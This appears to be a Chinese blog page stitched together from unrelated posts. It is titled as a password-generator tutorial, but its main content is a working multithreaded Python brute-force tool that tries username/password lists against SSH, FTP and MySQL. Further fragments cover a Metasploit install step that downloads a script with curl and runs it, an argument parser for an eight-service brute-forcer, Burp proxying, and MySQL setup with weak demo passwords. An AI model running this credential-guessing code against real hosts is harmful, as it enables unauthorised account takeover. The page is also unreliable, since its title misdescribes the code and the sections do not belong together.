Python 实现密码生成器
0x00 简介
有时候需要在网上注册许多账号,如果每个账户密码都一样的话,若被别人得知一个密码则所有账户就都沦陷了,若密码不一样则可能会忘记,在这里就用脚本写一个生成密码的工具,只需输入域名和账户名就可以根据key生成不一样的密码,也可以把域名和账户名写入文件,这样你用户名也可以不用记了。需要注意的是,key 在这里相当于主密码:一旦 key 泄露,所有账户的密码都可以被重新推算出来,因此 key 本身必须妥善保管。
more...有时候需要在网上注册许多账号,如果每个账户密码都一样的话,若被别人得知一个密码则所有账户就都沦陷了,若密码不一样则可能会忘记,在这里就用脚本写一个生成密码的工具,只需输入域名和账户名就可以根据key生成不一样的密码,也可以把域名和账户名写入文件,这样你用户名也可以不用记了。。。
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'this script can bruter ftp/ssh/mysql'
__author__ = 'reber'
import Queue
import threading
import time
import logging
import socket
from optparse import OptionParser
import paramiko
from ftplib import FTP
import MySQLdb
#################公有类#################
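class CommonFun(object):
    """Logging helpers shared by the service-specific classes in this file.

    Loggers are looked up by name through the ``logging`` module, so
    ``set_log`` and ``show_log`` only have to agree on ``lname``.
    """

    def __init__(self):
        super(CommonFun, self).__init__()

    def set_log(self, lname):
        """Configure the logger named ``lname`` to print DEBUG records to the console.

        The handler is attached only once per logger name. The original added a
        new ``StreamHandler`` on every call, so a second call for the same name
        made every record appear twice.
        """
        logger = logging.getLogger(lname)
        logger.setLevel(logging.DEBUG)
        # Marker attribute identifies the handler installed by this method.
        if any(getattr(h, "_commonfun_console", False) for h in logger.handlers):
            return
        ch = logging.StreamHandler()
        ch.setLevel(logging.DEBUG)
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        ch.setFormatter(formatter)
        ch._commonfun_console = True
        logger.addHandler(ch)

    def show_log(self, lname, msg):
        """Emit ``msg`` at DEBUG level on the logger named ``lname``."""
        logging.getLogger(lname).debug(msg)

    def show_result(self, lname, rlist):
        """Print a banner and log every entry of ``rlist``, or report that it is empty.

        Entries are written verbatim. The callers in this file pass
        "[OK] user:password" strings, so the console output (and anything that
        captures it) contains credentials in clear text.
        """
        if rlist:
            # print() with a single string prints the same text on Python 2 and 3.
            print("###################################################################")
            for x in rlist:
                self.show_log(lname, x)
        else:
            print("not found...")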
#################SSH爆破模块#################
class SshBruter(CommonFun):
    """Try every username/password pair from two word lists against SSH on one host.

    The pairs are queued as "user:password" strings and consumed by
    ``threadnum`` worker threads that each log in to port 22 with paramiko.
    NOTE(review): the nesting below was reconstructed from a paste that had
    lost its indentation; confirm it against the author's original file.
    """
    def __init__(self, *args):
        """Copy the parsed options onto the instance and set up logger and queue.

        ``args`` is expected to be ``(options, positional_args)`` as returned by
        ``OptionParser.parse_args``; only ``options`` is used.
        """
        super(SshBruter, self).__init__()
        (options,arg) = args
        self.host = options.host
        self.userfile = options.userfile
        self.passfile = options.passfile
        self.threadnum = options.threadnum
        self.timeout = options.timeout
        # Successful "[OK] user:password" strings, kept in clear text.
        self.result = []
        # The logger is named after the target host.
        self.set_log(self.host)
        self.qlist = Queue.Queue()
        # Set to True on Ctrl-C so the workers stop taking new pairs.
        self.is_exit = False
        print self.host,self.userfile,self.passfile,self.threadnum
    def get_queue(self):
        """Load both word lists and enqueue the full user x password product."""
        with open(self.userfile, 'r') as f:
            ulines = f.readlines()
        with open(self.passfile, 'r') as f:
            plines = f.readlines()
        for name in ulines:
            for pwd in plines:
                name = name.strip()
                pwd = pwd.strip()
                # The pair is serialised with ':' and split again in thread().
                self.qlist.put(name + ':' + pwd)
    def thread(self):
        """Worker loop: take pairs from the queue and attempt one SSH login each."""
        while not self.qlist.empty():
            if not self.is_exit:
                name,pwd = self.qlist.get().split(':')
                try:
                    # A new client, and therefore a new connection and a full password
                    # authentication, is created for every pair. Presumably each failed
                    # guess then shows up as its own failed login on the server, which
                    # is the event lockout and rate-limit controls count -- confirm
                    # against the target's sshd logging.
                    ssh = paramiko.SSHClient()
                    # AutoAddPolicy accepts whatever host key the server presents, so
                    # the server's identity is never verified.
                    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                    ssh.connect(hostname=self.host,port=22,username=name,password=pwd,timeout=self.timeout)
                    time.sleep(0.05)
                    ssh.close()
                    # The working credential is logged and stored in clear text.
                    s = "[OK] %s:%s" % (name,pwd)
                    self.show_log(self.host,s)
                    self.result.append(s)
                except socket.timeout:
                    # A timed-out pair is put back on the queue and retried later.
                    self.show_log(self.host,"Timeout...")
                    self.qlist.put(name + ':' + pwd)
                    time.sleep(3)
                except Exception, e:
                    # Every other failure (rejected password, refused connection, protocol
                    # error) is reported identically; ``e`` itself is not used.
                    error = "[Error] %s:%s" % (name,pwd)
                    self.show_log(self.host,error)
                    pass
            else:
                break
    def run(self):
        """Fill the queue, start the workers, wait for the queue to drain, print results."""
        self.get_queue()
        starttime = time.time()
        # Collected but never joined; completion is inferred from the queue below.
        threads = []
        for x in xrange(1,self.threadnum+1):
            t = threading.Thread(target=self.thread)
            threads.append(t)
            t.setDaemon(True) # daemon threads: the process exits with the main thread, whether or not workers have finished
            t.start()
        try:
            # Poll once per second. An empty queue only means every pair has been
            # taken by a worker, not that every attempt has finished.
            while True:
                if self.qlist.empty():
                    break
                else:
                    time.sleep(1)
        except KeyboardInterrupt:
            self.is_exit = True
            print "Exit the program..."
        print "Waiting..."
        # Fixed grace period; this is the only wait for attempts still in flight.
        time.sleep(5)
        self.show_result(self.host,self.result)
        finishetime = time.time()
        print "Used time: %f" % (finishetime-starttime)
#################FTP爆破模块#################
class FtpBruter(CommonFun):
    """Try every username/password pair from two word lists against FTP on one host.

    Same structure as the SSH class in this file, but logging in with
    ``ftplib.FTP`` on port 21. ``ftplib.FTP`` is plain FTP without TLS, so the
    candidate credentials cross the network in clear text.
    NOTE(review): the nesting below was reconstructed from a paste that had
    lost its indentation; confirm it against the author's original file.
    """
    def __init__(self, *args):
        """Copy the parsed options onto the instance and set up logger and queue.

        ``args`` is expected to be ``(options, positional_args)``; only
        ``options`` is used. Unlike the SSH class, ``is_exit`` is not
        initialised here.
        """
        super(FtpBruter, self).__init__()
        (options,arg) = args
        self.host = options.host
        self.userfile = options.userfile
        self.passfile = options.passfile
        self.threadnum = options.threadnum
        self.timeout = options.timeout
        # Successful "[OK] user:password" strings, kept in clear text.
        self.result = []
        self.set_log(self.host)
        self.qlist = Queue.Queue()
        print self.host,self.userfile,self.passfile,self.threadnum
    def get_queue(self):
        """Load both word lists and enqueue the full user x password product."""
        with open(self.userfile, 'r') as f:
            ulines = f.readlines()
        with open(self.passfile, 'r') as f:
            plines = f.readlines()
        for name in ulines:
            for pwd in plines:
                name = name.strip()
                pwd = pwd.strip()
                # The pair is serialised with ':' and split again in thread().
                self.qlist.put(name + ':' + pwd)
    def thread(self):
        """Worker loop: take pairs from the queue and attempt one FTP login each."""
        while not self.qlist.empty():
            name,pwd = self.qlist.get().split(':')
            try:
                # One control connection and one login per pair.
                ftp = FTP()
                ftp.connect(self.host, 21, self.timeout)
                ftp.login(name, pwd)
                time.sleep(0.05)
                ftp.quit()
                # The working credential is logged and stored in clear text.
                s = "[OK] %s:%s" % (name,pwd)
                self.show_log(self.host,s)
                self.result.append(s)
            except socket.timeout:
                # A timed-out pair is put back on the queue and retried later.
                self.show_log(self.host,"Timeout...")
                self.qlist.put(name + ':' + pwd)
                time.sleep(1)
            except Exception, e:
                # Every other failure is reported identically; ``e`` is not used.
                error = "[Error] %s:%s" % (name,pwd)
                self.show_log(self.host,error)
                pass
    def run(self):
        """Fill the queue, start the workers, wait for the queue to drain, print results."""
        self.get_queue()
        starttime = time.time()
        # Collected but never joined; completion is inferred from the queue below.
        threads = []
        for x in xrange(1,self.threadnum+1):
            t = threading.Thread(target=self.thread)
            threads.append(t)
            t.setDaemon(True) # daemon threads: the process exits with the main thread, whether or not workers have finished
            t.start()
        try:
            # Poll once per second until every pair has been taken by a worker.
            while True:
                if self.qlist.empty():
                    break
                else:
                    time.sleep(1)
        except KeyboardInterrupt:
            # NOTE(review): thread() in this class never reads is_exit, so setting
            # it here does not stop the workers.
            self.is_exit = True
            print "Exit the program..."
        print "Waiting..."
        # Fixed grace period; this is the only wait for attempts still in flight.
        time.sleep(5)
        self.show_result(self.host,self.result)
        finishetime = time.time()
        print "Used time: %f" % (finishetime-starttime)
#################MySQL爆破模块#################
class MysqlBruter(CommonFun):
    """Try every username/password pair from two word lists against MySQL on one host.

    Same structure as the SSH and FTP classes in this file, connecting with
    ``MySQLdb`` to port 3306 and the ``mysql`` database.
    NOTE(review): the nesting below was reconstructed from a paste that had
    lost its indentation; confirm it against the author's original file.
    """
    def __init__(self, *args):
        """Copy the parsed options onto the instance and set up logger and queue.

        ``args`` is expected to be ``(options, positional_args)``; only
        ``options`` is used. ``is_exit`` is not initialised here.
        """
        super(MysqlBruter, self).__init__()
        (options,arg) = args
        self.host = options.host
        self.userfile = options.userfile
        self.passfile = options.passfile
        self.threadnum = options.threadnum
        # Stored, but thread() does not pass it to MySQLdb.connect().
        self.timeout = options.timeout
        # Successful "[OK] user:password" strings, kept in clear text.
        self.result = []
        self.set_log(self.host)
        self.qlist = Queue.Queue()
        print self.host,self.userfile,self.passfile,self.threadnum
    def get_queue(self):
        """Load both word lists and enqueue the full user x password product."""
        with open(self.userfile, 'r') as f:
            ulines = f.readlines()
        with open(self.passfile, 'r') as f:
            plines = f.readlines()
        for name in ulines:
            for pwd in plines:
                name = name.strip()
                pwd = pwd.strip()
                # The pair is serialised with ':' and split again in thread().
                self.qlist.put(name + ':' + pwd)
    def thread(self):
        """Worker loop: take pairs from the queue and attempt one MySQL login each."""
        while not self.qlist.empty():
            name,pwd = self.qlist.get().split(':')
            try:
                # One connection per pair, made without a connect timeout argument.
                conn = MySQLdb.connect(host=self.host, user=name, passwd=pwd, db='mysql', port=3306)
                if conn:
                    # time.sleep(0.05)
                    conn.close()
                    # The working credential is logged and stored in clear text.
                    s = "[OK] %s:%s" % (name,pwd)
                    self.show_log(self.host,s)
                    self.result.append(s)
            except socket.timeout:
                # A timed-out pair is put back on the queue and retried later.
                self.show_log(self.host,"Timeout")
                self.qlist.put(name + ':' + pwd)
                time.sleep(3)
            except Exception, e:
                # Every other failure is reported identically; ``e`` is not used.
                error = "[Error] %s:%s" % (name,pwd)
                self.show_log(self.host,error)
                pass
    def run(self):
        """Fill the queue, start the workers, wait for the queue to drain, print results."""
        self.get_queue()
        starttime = time.time()
        # Collected but never joined; completion is inferred from the queue below.
        threads = []
        for x in xrange(1,self.threadnum+1):
            t = threading.Thread(target=self.thread)
            threads.append(t)
            t.setDaemon(True) # daemon threads: the process exits with the main thread, whether or not workers have finished
            t.start()
        try:
            # Poll once per second until every pair has been taken by a worker.
            while True:
                if self.qlist.empty():
                    break
                else:
                    time.sleep(1)
        except KeyboardInterrupt:
            # NOTE(review): thread() in this class never reads is_exit, so setting
            # it here does not stop the workers.
            self.is_exit = True
            print "Exit the program..."
        print "Waiting..."
        # Fixed grace period; this is the only wait for attempts still in flight.
        time.sleep(5)
        self.show_result(self.host,self.result)
        finishetime = time.time()
        print "Used time: %f" % (finishetime-starttime)
def main():
    """Parse the command line and run the class that matches the requested service.

    The single positional argument selects the service (ssh, ftp or mysql).
    Help is printed when the positional argument or the -i/--host option is
    missing; an unknown service name prints a one-line error instead.
    """
    cli = OptionParser(usage='Usage: python %prog [options] type')
    cli.add_option('-i', '--host', dest='host', help='target ip')
    cli.add_option('-o', '--timeout', type=int, dest='timeout', default=5, help='timeout')
    cli.add_option('-t', '--thread', type=int, dest='threadnum', default=10, help='threadnum')
    cli.add_option('-L', '--userfile', dest='userfile', default='username.txt', help='userfile')
    cli.add_option('-P', '--passfile', dest='passfile', default='password.txt', help='passfile')
    (options, args) = cli.parse_args()

    if not args:
        cli.print_help()
        exit()

    # Service name -> class; replaces the original if/elif chain.
    handlers = {'ssh': SshBruter, 'ftp': FtpBruter, 'mysql': MysqlBruter}
    service = args[0]
    if service not in handlers:
        # print() with a single string prints the same text on Python 2 and 3.
        print("type must be ssh or ftp or mysql")
        return

    # A known service without a target host only shows the usage text.
    if not options.host:
        cli.print_help()
        return

    handlers[service](options, args).run()
# Run main() only when the file is executed as a script, not when it is imported.
if __name__ == '__main__':
    main()
在msf里的工作平台可以保存历史的一些操作信息
扫描后的结果会保留在工作平台中,可以用hosts和services进行查看:
$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
# 执行前先查看下载到的 msfinstall 脚本内容,确认无误后再赋予执行权限并运行
$ chmod 755 msfinstall
$ ./msfinstall
$ msfupdate
$ /etc/init.d/postgresql start #service postgresql start也可以
$ msfdb init
$ msfconsole
msf > db_status
#若出现错误:Module database cache not built yet, using slow search
#则重新构建缓存,缓存构建通常需要5-10分钟左右。
#构建完成后,退出Metasploit控制台,然后重新进入即可使用数据库缓存进行搜索模块
msf > db_rebuild_cache
常见命令可以看下 https://www.comparitech.com/net-admin/metasploit-cheat-sheet/
参考 https://docs.python.org/zh-cn/3.7/library/argparse.html
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
class Parser(object):
    """Build the argparse command line for a multi-service credential-testing tool.

    Only the option definitions live here; nothing in this class opens a
    connection or reads the files named by the options.
    """

    def __init__(self):
        super(Parser, self).__init__()
        # Accepted values for -s.
        self.service_type_list = [
            "ssh", "telnet", "ftp",
            "mysql", "mssql", "oracle", "pgsql", "redis",
        ]
        # Accepted values for -v.
        self.log_level = ["debug", "info", "warning", "error", "critical"]
        # Epilog template; both placeholders receive the program name.
        self.example = (
            "Example:\n"
            "\r python3 {} -s ssh -i 123.123.123.123\n"
            "\r python3 {} -s ssh -i 123.123.123.123/24 -l root -p 123456"
        )

    def parser(self):
        """Return a configured ``argparse.ArgumentParser``; nothing is parsed here."""
        cli = argparse.ArgumentParser(
            # Raw formatter keeps the line breaks of the example epilog.
            formatter_class=argparse.RawDescriptionHelpFormatter,
            add_help=True,
        )
        cli.epilog = self.example.format(cli.prog, cli.prog)

        # (flag, keyword arguments), registered in this order.
        # NOTE: a password given with -p is part of the command line, so it is
        # visible in the process list and in shell history.
        option_table = (
            ("-i", dict(dest="host", type=str, help="Target ip")),
            ("-iL", dict(dest="host_file", type=str,
                         help="Target file name, one ip per line")),
            ("-l", dict(dest="user", type=str, help="username")),
            ("-p", dict(dest="pwd", type=str, help="password")),
            ("-lp", dict(dest="user_pwd_file", type=str,
                         help="user_pwd file, example: username:password")),
            ("-L", dict(dest="user_file", type=str, help="username file")),
            ("-P", dict(dest="pwd_file", type=str, help="password file")),
            ("--port", dict(dest="port", type=int, help="Target port")),
            ("-s", dict(dest="service_type", type=str, required=True,
                        choices=self.service_type_list, help="Service type")),
            ("-t", dict(dest="thread_num", type=int, default=10,
                        help="The number of threads, default is 10 threads")),
            ("-T", dict(dest="timeout", type=int, default=10,
                        help="Timeout, default is 10s")),
            ("-v", dict(dest="log_level", type=str, default="info",
                        choices=self.log_level,
                        help="Log Level, default is 'info'")),
        )
        for flag, spec in option_table:
            cli.add_argument(flag, **spec)
        return cli

    @staticmethod
    def init():
        """Create a ``Parser`` and return its configured argument parser."""
        return Parser().parser()
# Demo driver: build the parser, parse the real command line, then print the help
# text whatever was passed (parse_args exits first when -s is missing).
if __name__ == "__main__":
    parser = Parser().init()
    args = parser.parse_args()
    parser.print_help()
➜ python3 tmp.py
usage: tmp.py [-h] [-i HOST] [-iL HOST_FILE] [-l USER] [-p PWD]
[-lp USER_PWD_FILE] [-L USER_FILE] [-P PWD_FILE] [--port PORT]
-s {ssh,telnet,ftp,mysql,mssql,oracle,pgsql,redis}
[-t THREAD_NUM] [-T TIMEOUT]
[-v {debug,info,warning,error,critical}]
tmp.py: error: the following arguments are required: -s
➜ python3 tmp.py -s ssh
usage: tmp.py [-h] [-i HOST] [-iL HOST_FILE] [-l USER] [-p PWD]
[-lp USER_PWD_FILE] [-L USER_FILE] [-P PWD_FILE] [--port PORT]
-s {ssh,telnet,ftp,mysql,mssql,oracle,pgsql,redis}
[-t THREAD_NUM] [-T TIMEOUT]
[-v {debug,info,warning,error,critical}]
optional arguments:
-h, --help show this help message and exit
-i HOST Target ip
-iL HOST_FILE Target file name, one ip per line
-l USER username
-p PWD password
-lp USER_PWD_FILE user_pwd file, example: username:password
-L USER_FILE username file
-P PWD_FILE password file
--port PORT Target port
-s {ssh,telnet,ftp,mysql,mssql,oracle,pgsql,redis}
Service type
-t THREAD_NUM The number of threads, default is 10 threads
-T TIMEOUT Timeout, default is 10s
-v {debug,info,warning,error,critical}
Log Level, default is 'info'
Example:
python3 tmp.py -s ssh -i 123.123.123.123
python3 tmp.py -s ssh -i 123.123.123.123/24 -l root -p 123456
Windows Phone手机和电脑处于同一无线环境下:
挂burpsuite的代理下载证书
环境:CentOS-6.5-x86_64-minimal
安装Apache
yum install httpd
安装MySQL
[reber@localhost conf]$ sudo mysql_secure_installation
# 更新root密码(123456 仅为演示用的弱口令,实际环境请换成强密码):
[reber@localhost conf]$ mysql -uroot -p
mysql> use mysql;
mysql> update user set password=password('123456') where user='root';
mysql> flush privileges; //不想重启mysql就使新密码生效就需要运行此命令刷新
mysql> insert into mysql.user(Host,User,Password) values("localhost","blog",password("123456"));
# mysql> delete from mysql.user where User='blog' and Host='localhost'; //这步可以删除用户
mysql> flush privileges; //刷新
mysql> create database db_blog;
Query OK, 1 row affected (0.00 sec)
# 授权用户"blog"拥有db_blog数据库的所有权限
mysql> grant all privileges on db_blog.* to blog@localhost identified by '666666';
mysql> flush privileges; //刷新
[reber@localhost conf]$ mysql -ublog -p //此时就需要用666666登陆数据库db_blog
安装PHP
-V 显示版本
-f 输入密码后进入后台模式
-N 不执行远程命令,一般与-f连用,用于端口转发
-C 压缩传输的数据,网速快时会影响速度